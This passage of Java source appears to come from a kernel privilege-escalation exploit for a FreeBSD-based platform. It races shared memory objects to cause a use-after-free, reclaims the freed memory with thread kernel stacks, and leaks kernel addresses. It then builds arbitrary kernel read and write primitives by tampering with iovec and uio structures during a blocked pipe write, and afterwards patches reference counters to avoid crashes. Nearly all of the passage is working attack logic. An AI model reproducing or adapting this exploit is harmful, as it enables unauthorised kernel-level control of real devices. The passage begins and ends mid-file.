throw Log.error("[main] Destroying secondary user mutex #" + i + " failed");
}
}
Log.debug("[main] Switching to initial core");
if (!ThreadUtil.setCurrentThreadCpuAffinity(MAIN_THREAD_CORES)) {
throw Log.error("[main] Switching to initial core failed");
}
Log.debug("[main] Spraying done");
Log.debug("[main] Checking for shared memory object corruption");
descriptor = checkForCorruption();
if (descriptor != -1) {
Log.debug("[main] Checking succeeded, winner descriptor of shared memory object: " + descriptor);
winnerDescriptor = descriptor;
} else {
Log.debug("[main] Checking failed");
}
for (int i = 0; i < reclaimDescriptors.length; i++) {
descriptor = reclaimDescriptors[i];
if (descriptor == -1) {
continue;
}
if (winnerDescriptor != -1 && winnerDescriptor == descriptor) {
// We do not need to close it, so just reset descriptor.
destroyerThreadIndex = i;
} else {
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
throw Log.error("Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i + " failed");
}
reclaimDescriptors[i] = -1;
}
}
// Notify all threads that they should not be destroyed yet.
destroyFlag.set(false);
// Notify other threads that check was done.
checkDoneFlag.set(true);
if (count == MAX_DESTROYER_THREADS && winnerDescriptor != -1) {
// Set new size of primary shared memory object to match kernel stack size.
Log.debug("[main] Truncating shared memory object with descriptor #" + winnerDescriptor);
if (!KernelHelper.truncateSharedMemory(winnerDescriptor, Constants.KERNEL_STACK_SIZE)) {
throw Log.error("[main] Truncating shared memory object with descriptor #" + winnerDescriptor + " failed");
}
final long lookupSize = KernelHelper.getFileSize(lookupDescriptor, statAddress);
Log.debug("[main] Size of shared memory object with lookup descriptor #" + lookupDescriptor + ": " + TypeUtil.int64ToHex(lookupSize));
final long winnerSize = KernelHelper.getFileSize(winnerDescriptor, statAddress);
Log.debug("[main] Size of shared memory object with winner descriptor #" + winnerDescriptor + ": " + TypeUtil.int64ToHex(winnerSize));
Log.debug("[main] We have some result!!!");
// Notify other threads that racing succeeded.
raceDoneFlag.set(true);
}
// Wait until other threads will be ready to finish.
waitForCounter(numReadyThreads, MAX_DESTROYER_THREADS + 1, " threads to be ready for finish"); // Plus one for lookup thread
// Notify other threads that we are done.
doneFlag.set(true);
// Wait until other threads will be finished.
waitForCounter(numFinishedThreads, MAX_DESTROYER_THREADS + 1, " threads to be finished"); // Plus one for lookup thread
// Reset everything if we did not find proper descriptor.
if (winnerDescriptor == -1) {
Log.debug("[main] Cleaning up state");
cleanupState();
Log.debug("[main] Resetting state");
resetState();
}
numIterations++;
Log.debug("[main] Finishing loop");
}
// Recover initial CPU affinity mask for main thread.
Log.debug("Recovering initial CPU affinity mask for main thread");
if (!ThreadUtil.setCurrentThreadCpuAffinity(api.getInitialCpuAffinity())) {
throw Log.error("Recovering initial CPU affinity mask for main thread failed");
}
final boolean gotResult = raceDoneFlag.get();
// Notify other threads that we are done.
raceDoneFlag.set(true);
if (gotResult) {
Log.debug("Original descriptor of primary shared memory object: " + originalDescriptor);
if (lookupDescriptor == -1) {
throw Log.error("Racing done but lookup descriptor not found");
}
Log.debug("Lookup descriptor of primary shared memory object: " + lookupDescriptor);
if (winnerDescriptor == -1) {
throw Log.error("Racing done but winner descriptor not found");
}
Log.debug("Winner descriptor of primary shared memory object: " + winnerDescriptor);
Log.info("Got memory corruption after " + numIterations + " iterations");
} else {
Log.warn("No memory corruption even after " + numIterations + " iterations");
}
return gotResult;
}
private void finishWorkingThreads() {
// Finish all working threads, thus only reclaim threads will be running.
destroyFlag.set(true);
// Give other threads some time to finish.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
Log.debug("Joining lookup thread");
try {
lookupThread.join();
} catch (InterruptedException e) {
throw Log.error("Joining lookup thread failed");
}
Log.debug("Unsetting lookup thread");
lookupThread = null;
Log.debug("Joining destroyer threads");
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
final Thread thread = destroyerThreads.get(i);
//Log.debug("Joining destroyer thread #" + i);
try {
thread.join();
} catch (InterruptedException e) {
throw Log.error("Joining destroyer thread #" + i + " failed");
}
}
Log.debug("Clearing destroyer thread list");
destroyerThreads.clear();
}
private boolean postExploit() {
if (destroyerThreadIndex == -1) {
Log.debug("No destroyer thread index found");
return false;
}
if (toggleStoppingWorkingThreadsBeforeRemap) {
finishWorkingThreads();
}
for (int i = 0; i < MAX_EXTRA_USER_MUTEXES; i++) {
Log.debug("Creating extra user mutex #" + i);
final int descriptor = KernelHelper.createUserMutex(extraSharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("Creating extra user mutex #" + i + " failed");
}
Log.debug("Descriptor of extra shared memory object #" + i + ": " + descriptor);
}
// Free primary shared memory object.
if (winnerDescriptor != -1) {
Log.debug("Closing winner descriptor #" + winnerDescriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(winnerDescriptor)) {
throw Log.error("Closing winner descriptor #" + winnerDescriptor + " of primary shared memory object");
}
winnerDescriptor = -1;
}
// Map memory of freed primary shared memory object.
Log.debug("Mapping memory of shared memory object with lookup descriptor #" + lookupDescriptor);
long mappedKernelStackAddress = KernelHelper.mapMemoryWithDescriptor(0, Constants.KERNEL_STACK_SIZE, lookupDescriptor, 0);
if (mappedKernelStackAddress != 0L) {
Log.debug("Mapped address of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
mappedKernelStackAddresses.add(new Long(mappedKernelStackAddress));
Log.debug("Protecting mapped memory of potential kernel stack");
if (KernelHelper.protectMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE, Constants.PROT_READ | Constants.PROT_WRITE)) {
} else {
Log.debug("Protecting mapped memory of potential kernel stack failed");
if (toggleUnmappingOnFailure) {
Log.debug("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
if (!KernelHelper.unmapMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE)) {
Log.warn("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress) + " failed");
}
}
mappedKernelStackAddress = 0L;
}
} else {
Log.debug("Mapping memory of shared memory object with lookup descriptor #" + lookupDescriptor + " failed");
}
if (!toggleStoppingWorkingThreadsBeforeRemap) {
finishWorkingThreads();
}
long threadAddress = 0L;
if (mappedKernelStackAddress != 0L) {
// We need to observe kernel stack before destroying any running threads.
destroyFlag.set(false);
final int scanSize = Constants.PHYS_PAGE_SIZE;
final long scanAddress = mappedKernelStackAddress + Constants.KERNEL_STACK_SIZE - scanSize;
stackDataBuffer = new MemoryBuffer(scanAddress, scanSize - 0x20);
Log.debug("Starting reclaim threads");
// Start reclaim threads to occupy freed shared memory object with virtual memory object of one of theirs kernel stack.
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
final Thread thread = reclaimThreads.get(i);
//Log.debug("Starting reclaim thread #" + i);
thread.start();
}
Log.debug("Reclaim threads started");
// There is could be a problem when threads are created, address of freed shared memory object
// can be reused (initialized with zeros). See: sys_thr_new -> kern_thr_new -> thread_create -> kern_thr_alloc
// Kick all reclaim threads at once, thus they could start real execution at same time.
readyFlag.set(true);
Log.debug("Checking if reclaimed memory belongs to controlled thread");
// XXX: Need to be careful with logging here because it may cause reliability problems.
boolean reclaimThreadFound = false;
boolean accessChecked = false;
for (int i = 0; i < MAX_SEARCH_LOOP_INVOCATIONS; i++) {
// Give some execution time to reclaimed threads.
ThreadUtil.sleepMs(KERNEL_STACK_WAIT_PERIOD);
if (!accessChecked) {
// Mapped memory region could be not readable, check that.
if (!api.checkMemoryAccess(mappedKernelStackAddress)) {
Log.debug("Checking access to reclaimed memory failed");
if (toggleUnmappingOnFailure) {
Log.debug("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
if (!KernelHelper.unmapMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE)) {
Log.warn("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress) + " failed");
}
}
mappedKernelStackAddress = 0L;
break;
}
accessChecked = true;
}
if (dumpKernelStackPartially) {
final int count = stackDataBuffer.getSize() / 8;
boolean allZeros = true;
for (int j = 0; j < count; j++) {
final long value = stackDataBuffer.read64(j * 8);
if (value != 0L) {
Log.debug("Found some kernel stack data at " + TypeUtil.int32ToHex(j * 8) + ": " + TypeUtil.int64ToHex(value, true));
allZeros = false;
break;
}
}
if (!allZeros) {
Log.info("Leaked partial kernel stack data:");
stackDataBuffer.dump();
}
}
final int offset = stackDataBuffer.find(markerPatternAddress, 0x3);
if (offset != -1) {
Log.debug("Found marker pattern in kernel stack at " + TypeUtil.int32ToHex(offset));
if (dumpKernelStackOfReclaimThread) {
Log.info("Leaked kernel stack data:");
stackDataBuffer.dump();
}
Log.debug("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
if (dumpKernelStackPointers) {
classifier.dump();
}
// Get last byte of pattern and convert it to reclaim job index.
final int reclaimJobIndex = (stackDataBuffer.read8(offset + 3) - 0x41) - 1;
Log.debug("Determined reclaim job index: " + reclaimJobIndex);
if (reclaimJobIndex >= 0 && reclaimJobIndex < MAX_RECLAIM_THREADS) {
final ReclaimJob job = (ReclaimJob)reclaimJobs.get(reclaimJobIndex);
final String jobName = job.getJobName();
Log.debug("Found reclaim thread '" + jobName + "' using " + (i + 1) + " attempts");
mappedReclaimKernelStackAddress = mappedKernelStackAddress;
final Long potentialThreadAddress = classifier.getMostOccuredHeapAddress(KERNEL_THREAD_POINTER_OCCURRENCE_THRESHOLD);
if (potentialThreadAddress != null) {
final long potentialThreadAddressValue = potentialThreadAddress.longValue();
Log.info("Found potential kernel thread address: " + TypeUtil.int64ToHex(potentialThreadAddressValue));
threadAddress = potentialThreadAddressValue;
}
api.setKernelPrimitives(Api.KERNEL_PRIMITIVES_KIND_SLOW);
job.setTarget(true);
break;
} else {
Log.debug("Job index is bad, continuing checking");
}
}
}
if (mappedReclaimKernelStackAddress != 0L) {
Log.debug("[main] Resetting ready flag");
readyFlag.set(false);
} else {
Log.debug("[main] Reclaim thread not found");
}
// Trigger all threads (except reclaim one) to terminate execution.
destroyFlag.set(true);
Thread.yield();
Log.debug("Joining reclaim threads");
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
final Thread thread = reclaimThreads.get(i);
final ReclaimJob job = (ReclaimJob)reclaimJobs.get(i);
if (!job.isTarget()) {
//Log.debug("Joining reclaim thread #" + i);
try {
thread.join();
} catch (InterruptedException e) {
throw Log.error("Joining reclaim thread #" + i + " failed");
}
} else {
Log.debug("Skipping target reclaim thread #" + i);
targetReclaimThread = thread;
targetReclaimJob = job;
}
}
reclaimThreads.clear();
reclaimJobs.clear();
} else {
// Trigger all threads to terminate execution.
destroyFlag.set(true);
}
boolean succeeded = mappedReclaimKernelStackAddress != 0L;
if (succeeded) {
// Let reclaim thread do blocking read call.
Log.debug("[main] Setting ready flag");
readyFlag.set(true);
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
Log.debug("[main] Attempting to unlock pipe for kernel primitives");
if (!targetReclaimJob.unlockPipe()) {
Log.warn("[main] Attempting to unlock pipe for kernel primitives failed");
succeeded = false;
} else {
Log.debug("[main] Pipe for kernel primitives unlocked");
}
if (succeeded) {
Log.debug("[main] Waiting for command processor to start up");
while (!targetReclaimJob.isCommandProccesorRunning()) {
Thread.yield();
}
Log.debug("[main] Done waiting for command processor to start up");
boolean isGoodAddress = false;
if (threadAddress != 0L) {
// Check if leaked kernel thread address actually belongs to reclaim thread.
final long kernelThreadNameAddress = threadAddress + Offsets.offsetOf_thread_name;
final Integer result = readSlow(kernelThreadNameAddress, threadNameAddress, MAX_RECLAIM_THREAD_NAME_SIZE);
if (result != null && result.intValue() == MAX_RECLAIM_THREAD_NAME_SIZE) {
final String threadName = api.readCString(threadNameAddress, MAX_RECLAIM_THREAD_NAME_SIZE - 1);
Log.debug("Leaked kernel thread name: " + threadName);
if (threadName.equals(targetReclaimJob.getJobName())) {
isGoodAddress = true;
Log.debug("Kernel thread address is correct");
} else {
Log.warn("Leaked kernel address does not belong to reclaim thread");
}
}
if (!isGoodAddress) {
Log.warn("Potential kernel thread address is not correct");
}
} else {
// Should not happen in normal situation.
Log.warn("Potential kernel thread address not found");
}
if (isGoodAddress) {
Globals.threadAddress = threadAddress;
} else {
// Should not happen in normal situation.
throw Log.error("Initial kernel primitives can be still used for further exploitation");
}
}
if (!succeeded) {
// XXX: Ideally reclaim thread should be cleaned up in this case
// but since we have some problem we cannot recover things, thus
// kernel may panic after some time.
targetReclaimThread = null;
targetReclaimJob = null;
}
}
System.gc();
return succeeded;
}
private static void waitForCounter(AtomicInteger value, int threshold, String text) {
int count = 0;
while (true) {
count = value.get();
if (count >= threshold) {
break;
}
//Log.debug("[main] Waiting for" + text + " (" + count + "/" + threshold + ")");
Thread.yield();
}
//Log.debug("[main] Done waiting for" + text + " (" + count + "/" + threshold + ")");
}
private static boolean truncateSharedMemorySpecial(int descriptor) {
return KernelHelper.truncateSharedMemory(descriptor, (long)descriptor * MAGIC_NUMBER);
}
//-------------------------------------------------------------------------
public boolean stabilize() {
Log.debug("Fixing up shared memory object file");
if (!fixupSharedMemory()) {
Log.warn("Fixing up shared memory object file failed");
}
Log.debug("Fixing up kernel stack");
if (!fixupKernelStack()) {
Log.warn("Fixing up kernel stack failed");
}
return true;
}
private boolean fixupSharedMemory() {
if (Globals.processAddress == 0L) {
Log.warn("Process address not found");
return false;
}
Log.debug("Process address: " + TypeUtil.int64ToHex(Globals.processAddress));
if (lookupDescriptor == -1) {
Log.warn("Lookup descriptor of primary shared memory object not found");
return false;
}
Log.debug("Lookup descriptor of primary shared memory object: " + lookupDescriptor);
long[] fileAddresses;
long fileAddress, fileDescEntryAddress;
fileAddresses = ProcessUtil.getFileDescAddressesForProcessByDescriptor(Globals.processAddress, lookupDescriptor, false);
if (fileAddresses == null) {
Log.warn("Getting file addresses of lookup descriptor failed");
return false;
}
fileAddress = fileAddresses[0];
if (fileAddress == 0L) {
Log.warn("Lookup file address not found");
return false;
}
Log.debug("Lookup file address: " + TypeUtil.int64ToHex(fileAddress));
long refCountAddress;
int numFixes = 0;
final long sharedMemoryFileDescAddress = api.readKernel64(fileAddress + Offsets.offsetOf_file_data); // void* f_data (struct shmfd*)
if (sharedMemoryFileDescAddress != 0L) {
Log.debug("Shared memory file descriptor address: " + TypeUtil.int64ToHex(sharedMemoryFileDescAddress));
refCountAddress = sharedMemoryFileDescAddress + Offsets.offsetOf_shmfd_refs;
Log.debug("Stabilizing reference counter of shared memory file descriptor at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes++;
} else {
Log.warn("Shared memory file descriptor address not found");
}
refCountAddress = fileAddress + Offsets.offsetOf_file_count;
Log.debug("Stabilizing reference counter of file at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes++;
final Iterator<Integer> iterator = usedDescriptors.iterator();
while (iterator.hasNext()) {
final int descriptor = ((Integer)iterator.next()).intValue();
Log.debug("Checking exploited descriptor #" + descriptor);
fileAddresses = ProcessUtil.getFileDescAddressesForProcessByDescriptor(Globals.processAddress, descriptor, false);
if (fileAddresses != null) {
fileAddress = fileAddresses[0];
Log.debug("File address: " + TypeUtil.int64ToHex(fileAddress));
fileDescEntryAddress = fileAddresses[1];
Log.debug("File descriptor entry address: " + TypeUtil.int64ToHex(fileDescEntryAddress));
if (fileAddress != 0L && fileDescEntryAddress != 0L) {
final short fileType = api.readKernel16(fileAddress + Offsets.offsetOf_file_type); // short f_type
if (fileType == Constants.DTYPE_SHM) {
// Reset file pointer of exploited shared memory file object. This is workaround for `shm_drop` crash after `shmfd`
// being reused, so `shm_object` may contain garbage pointer and it can be dereferenced there.
Log.debug("Overwriting file address");
// TODO: Check if needed (causes crashes sometimes?):
//api.writeKernel64(fileDescEntryAddress + Offsets.offsetOf_filedescent_file, 0L); // struct file* fde_file
numFixes++;
}
} else {
Log.warn("File address of descriptor #" + descriptor + " not found");
}
} else {
Log.warn("Getting file addresses of descriptor #" + descriptor + " failed");
}
}
return numFixes >= 2;
}
private boolean fixupKernelStack() {
final int stackUserAddressCount = mappedKernelStackAddresses.size();
if (stackUserAddressCount == 0) {
return false;
}
// Wipe `td_kstack`, thus kernel would not try to destroy it.
api.writeKernel64(Globals.threadAddress + Offsets.offsetOf_thread_kstack, 0L); // vm_offset_t td_kstack
final int[] numFixes = new int[] { 0 };
class FixVirtualMemoryMap implements MemoryUtil.VirtualMemoryMapEntryProcessor {
public Boolean processEntry(long mapEntryKernelAddress, MemoryBuffer mapEntryBuffer, long index) {
//Checks.ensureKernelAddressRange(mapEntryKernelAddress, Offsets.sizeOf_vm_map_entry);
//Checks.ensureNotNull(mapEntryBuffer);
final long startUserAddress = mapEntryBuffer.read64(Offsets.offsetOf_vm_map_entry_start);
//Log.debug("Start user address: " + TypeUtil.int64ToHex(startUserAddress));
final Iterator<Long> iterator = mappedKernelStackAddresses.iterator();
int addressIndex = 0;
while (iterator.hasNext()) {
final Long userAddress = iterator.next();
//Log.debug("Current user address: " + TypeUtil.int64ToHex(userAddress));
if (userAddress == startUserAddress) {
Log.debug("Found match with kernel stack #" + addressIndex + ": " + TypeUtil.int64ToHex(userAddress));
final long objectAddress = mapEntryBuffer.read64(Offsets.offsetOf_vm_map_entry_object);
Log.debug("Object address: " + TypeUtil.int64ToHex(objectAddress));
if (objectAddress != 0L) {
final long refCountAddress = objectAddress + Offsets.offsetOf_vm_object_ref_count;
Log.debug("Stabilizing reference counter at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes[0]++;
}
}
addressIndex++;
}
final boolean needMore = numFixes[0] < stackUserAddressCount;
return new Boolean(needMore);
}
}
final long vmMapAddress = Globals.vmSpaceAddress + Offsets.offsetOf_vmspace_map;
Log.debug("VM map address: " + TypeUtil.int64ToHex(vmMapAddress));
Log.debug("Traversing VM map entries");
if (!MemoryUtil.traverseVirtualMemoryMap(vmMapAddress, new FixVirtualMemoryMap())) {
Log.warn("Traversing VM map entries failed");
return false;
}
return numFixes[0] >= stackUserAddressCount;
}
//-------------------------------------------------------------------------
public Byte read8Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x1L);
if (readSlow(kernelAddress, valueAddress, 0x1L) != 0x1L) {
return null;
}
return new Byte(api.read8(valueAddress));
}
public boolean write8Slow(long kernelAddress, byte value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x1L);
api.write8(valueAddress, value);
return writeSlow(kernelAddress, valueAddress, 0x1L) == 0x1L;
}
public Short read16Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x2L);
if (readSlow(kernelAddress, valueAddress, 0x2L) != 0x2L) {
return null;
}
return new Short(api.read16(valueAddress));
}
public boolean write16Slow(long kernelAddress, short value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x2L);
api.write16(valueAddress, value);
return writeSlow(kernelAddress, valueAddress, 0x2L) == 0x2L;
}
public Integer read32Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x4L);
if (readSlow(kernelAddress, valueAddress, 0x4L) != 0x4L) {
return null;
}
return new Integer(api.read32(valueAddress));
}
public boolean write32Slow(long kernelAddress, int value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x4L);
api.write32(valueAddress, value);
return writeSlow(kernelAddress, valueAddress, 0x4L) == 0x4L;
}
public Long read64Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x8L);
if (readSlow(kernelAddress, valueAddress, 0x8L) != 0x8L) {
return null;
}
return new Long(api.read64(valueAddress));
}
public boolean write64Slow(long kernelAddress, long value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x8L);
api.write64(valueAddress, value);
return writeSlow(kernelAddress, valueAddress, 0x8L) == 0x8L;
}
public Long readSlow(long kernelAddress, long userAddress, long size) {
Checks.ensureKernelAddressRange(kernelAddress, size);
Checks.ensureUserAddressRange(userAddress, size);
Checks.ensureNotNull(targetReclaimJob);
if (size == 0L) {
return new Long(0L);
}
class Processor implements MemoryUtil.MemoryRangeProcessor {
private long userAddress;
public Processor(long userAddress) {
this.userAddress = userAddress;
}
public Boolean processChunk(long kernelAddress, long chunkSize, boolean isLastChunk) {
//Log.debug("Reading" + (isLastChunk ? " last" : "") + " chunk from kernel address " + TypeUtil.int64ToHex(kernelAddress) + " to user address " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(chunkSize) + " bytes");
final Long tempResult = readSlowInternal(kernelAddress, userAddress, chunkSize);
if (tempResult == null) {
return new Boolean(false);
}
final long count = tempResult.longValue();
final boolean completed = (count == chunkSize);
//Log.debug("Got " + (completed ? "all " : "") + TypeUtil.int64ToHex(count) + " bytes");
userAddress += tempResult.longValue();
return new Boolean(completed);
}
}
final Processor processor = new Processor(userAddress);
synchronized (targetReclaimJob) {
final long lastKernelAddress = MemoryUtil.processMemoryRange(kernelAddress, size, processor, MemoryUtil.MEMORY_KIND_KERNEL, Api.MAX_PIPE_BUFFER_SIZE);
if (lastKernelAddress == 0L) {
return null;
}
final long result = lastKernelAddress - kernelAddress;
return new Long(result);
}
}
public Integer readSlow(long kernelAddress, long userAddress, int size) {
final Long result = readSlow(kernelAddress, userAddress, Checks.checkedInteger(size));
if (result == null) {
return null;
}
return new Integer(result.intValue());
}
public Long writeSlow(long kernelAddress, long userAddress, long size) {
Checks.ensureKernelAddressRange(kernelAddress, size);
Checks.ensureUserAddressRange(userAddress, size);
Checks.ensureNotNull(targetReclaimJob);
if (size == 0L) {
return new Long(0L);
}
class Processor implements MemoryUtil.MemoryRangeProcessor {
private long userAddress;
public Processor(long userAddress) {
this.userAddress = userAddress;
}
public Boolean processChunk(long kernelAddress, long chunkSize, boolean isLastChunk) {
//Log.debug("Writing " + (isLastChunk ? "last " : "") + "chunk from user address " + TypeUtil.int64ToHex(userAddress) + " to kernel address " + TypeUtil.int64ToHex(kernelAddress) + " of size " + TypeUtil.int64ToHex(chunkSize) + " bytes");
final Long tempResult = writeSlowInternal(kernelAddress, userAddress, chunkSize);
if (tempResult == null) {
return new Boolean(false);
}
final long count = tempResult.longValue();
final boolean completed = (count == chunkSize);
//Log.debug("Got " + (completed ? "all " : "") + TypeUtil.int64ToHex(count) + " bytes");
userAddress += tempResult.longValue();
return new Boolean(completed);
}
}
final Processor processor = new Processor(userAddress);
synchronized (targetReclaimJob) {
final long lastKernelAddress = MemoryUtil.processMemoryRange(kernelAddress, size, processor, MemoryUtil.MEMORY_KIND_KERNEL, Api.MAX_PIPE_BUFFER_SIZE);
if (lastKernelAddress == 0L) {
return null;
}
final long result = lastKernelAddress - kernelAddress;
return new Long(result);
}
}
public Integer writeSlow(long kernelAddress, long userAddress, int size) {
final Long result = writeSlow(kernelAddress, userAddress, Checks.checkedInteger(size));
if (result == null) {
return null;
}
return new Integer(result.intValue());
}
private Long readSlowInternal(long kernelAddress, long userAddress, long size) {
Checks.ensureTrue(KernelHelper.checkSizeForReadWriteIntoPipe(size));
if (size == 0L) {
return new Long(0L);
}
// Blocking algorithm for pipe:
// 1) On main thread start writing to pipe until we fill buffer of size equal to `BIG_PIPE_SIZE` (or `pipeBufferCapacity`).
// Each write size should be less than `PIPE_MINDIRECT`, otherwise it will trigger `pipe_direct_write` which is
// not good if we want proper blocking.
// 2) On reclaim thread do write to same pipe again, thus getting block, then we should modify kernel stack of this thread and
// change `struct iov` and `struct uio`.
// 3) On main thread start reading from pipe using size of `BIG_PIPE_SIZE` (or `pipeBufferCapacity`). It will unblock
// reclaim thread, so it starts writing to pipe using modified parameters. We should ignore data that was read.
// 4) On main thread start reading from same pipe again, but now using size we used when did modification.
//
// pipe_write(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
// uiomove(void* cp = &wpipe->pipe_buffer.buffer[wpipe->pipe_buffer.in], int n = segsize, struct uio* uio = uio)
// uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
// UIO_USERSPACE: copyin(const void* uaddr = iov->iov_base, void* kaddr = cp, size_t len = cnt)
// UIO_SYSSPACE: bcopy(const void* src = iov->iov_base, void* dst = cp, size_t len = cnt)
// Clear pipe buffer.
//api.clearMemory(pipeBufferAddress, pipeBufferCapacity);
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandArg(0, kernelAddress); // src
targetReclaimJob.setCommandArg(1, userAddress); // dst
targetReclaimJob.setCommandArg(2, size); // size
// Preparation step to make further write call blocking.
final int count = MathUtil.divideUnsigned(pipeBufferCapacity, Api.MAX_PIPE_BUFFER_SIZE);
//Log.debug("Pipe write count: " + count);
int garbageSize = 0;
for (int i = 0; i < count; i++) {
//Log.debug("Writing to write pipe #" + writePipeDescriptor + " at " + TypeUtil.int64ToHex(pipeBufferAddress) + " of size " + TypeUtil.int32ToHex(Api.MAX_PIPE_BUFFER_SIZE) + " bytes");
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
if (result == -1L) {
api.warnMethodFailedPosix("write");
return null;
} else if (result == 0L) {
Log.debug("Writing done");
break;
}
final int curSize = (int)result;
garbageSize += curSize;
//Log.debug("Written " + TypeUtil.int32ToHex(curSize) + " bytes");
}
//Log.debug("Garbage size: " + TypeUtil.int32ToHex(garbageSize));
// Issue read command.
//Log.debug("Issuing read command");
targetReclaimJob.setCommand(CMD_READ);
// Wait for blocking write call on other thread.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
// We have this partial stack layout:
// struct {
// struct iovec aiov;
// struct uio auio;
// };
//
// To locate it inside buffer let's make search pattern based on known `aiov`.
ioVec.setBase(pipeBufferAddress);
ioVec.setLength(size);
ioVec.serialize(ioVecAddress);
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
while (targetReclaimJob.getCommandWaitFlag()) {
if (dumpKernelStackOfReclaimThread) {
Log.info("Kernel stack data:");
stackDataBuffer.dump();
}
if (dumpKernelStackPointers) {
Log.info("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
classifier.dump();
}
//Log.debug("Searching kernel stack for IO vector data");
//api.dumpMemory(ioVecAddress, Offsets.sizeOf_iovec);
final int offset = stackDataBuffer.find(ioVecAddress, Offsets.sizeOf_iovec);
//Log.debug("Found offset: " + TypeUtil.int32ToHex(offset));
if (offset != -1) {
final long ioVecMappedAddress = stackDataBuffer.getAddress() + offset;
final long uioMappedAddress = ioVecMappedAddress + Offsets.sizeOf_iovec;
//Log.debug("Found IO vector data in kernel stack at " + TypeUtil.int64ToHex(ioVecMappedAddress));
ioVec.deserialize(ioVecMappedAddress);
//Log.debug("iovec: " + TypeUtil.inspectObject(ioVec));
uio.deserialize(uioMappedAddress);
//Log.debug("uio: " + TypeUtil.inspectObject(uio));
if (ioVec.getBase() == pipeBufferAddress && ioVec.getLength() == size && uio.getSegmentFlag() == Constants.UIO_USERSPACE && uio.getReadWrite() == Constants.UIO_WRITE) {
//Log.debug("GOT MATCH!!!");
api.write64(ioVecMappedAddress + Offsets.offsetOf_iovec_base, kernelAddress);
api.write32(uioMappedAddress + Offsets.offsetOf_uio_segflg, Constants.UIO_SYSSPACE);
break;
}
}
Thread.yield();
}
// Extra step to unblock write call on other thread by reading back garbage data from pipe.
//Log.debug("Reading garbage data from read pipe #" + readPipeDescriptor + " at " + TypeUtil.int64ToHex(pipeBufferAddress) + " of size " + TypeUtil.int32ToHex(garbageSize) + " bytes");
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, garbageSize);
if (result == -1L) {
api.warnMethodFailedPosix("read");
return null;
} else if (result != garbageSize) {
Log.warn("Result of read operation is not consistent: " + TypeUtil.int64ToHex(result) + " vs " + TypeUtil.int32ToHex(garbageSize));
}
// Wait until reclaim thread report about result.
//Log.debug("Waiting for command processor");
while (targetReclaimJob.getCommandWaitFlag()) {
Thread.yield();
}
// Get result from reclaim thread.
final long result2 = targetReclaimJob.getCommandResult();
final int errNo = targetReclaimJob.getCommandErrNo();
//Log.debug("Write result from reclaim thread is " + TypeUtil.int64ToHex(result2) + " and error is " + errNo);
if (result2 == -1L) {
api.warnMethodFailedPosix("write", errNo);
return null;
} else if (result2 != size) {
Log.warn("Result of write operation is not consistent: " + TypeUtil.int64ToHex(result2) + " vs " + TypeUtil.int64ToHex(size));
}
// Read data from corresponding pipe.
//Log.debug("Reading data from read pipe #" + readPipeDescriptor + " at " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(size) + " bytes");
final long result3 = LibKernel.read(readPipeDescriptor, userAddress, size);
if (result3 == -1L) {
api.warnMethodFailedPosix("read");
return null;
}
//Log.debug("Number of bytes read: " + TypeUtil.int64ToHex(result3));
return new Long(result3);
}
private Long writeSlowInternal(long kernelAddress, long userAddress, long size) {
Checks.ensureTrue(KernelHelper.checkSizeForReadWriteIntoPipe(size));
if (size == 0L) {
return new Long(0L);
}
// pipe_read(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
// uiomove(void* cp = &rpipe->pipe_buffer.buffer[rpipe->pipe_buffer.out], int n = size, struct uio* uio = uio)
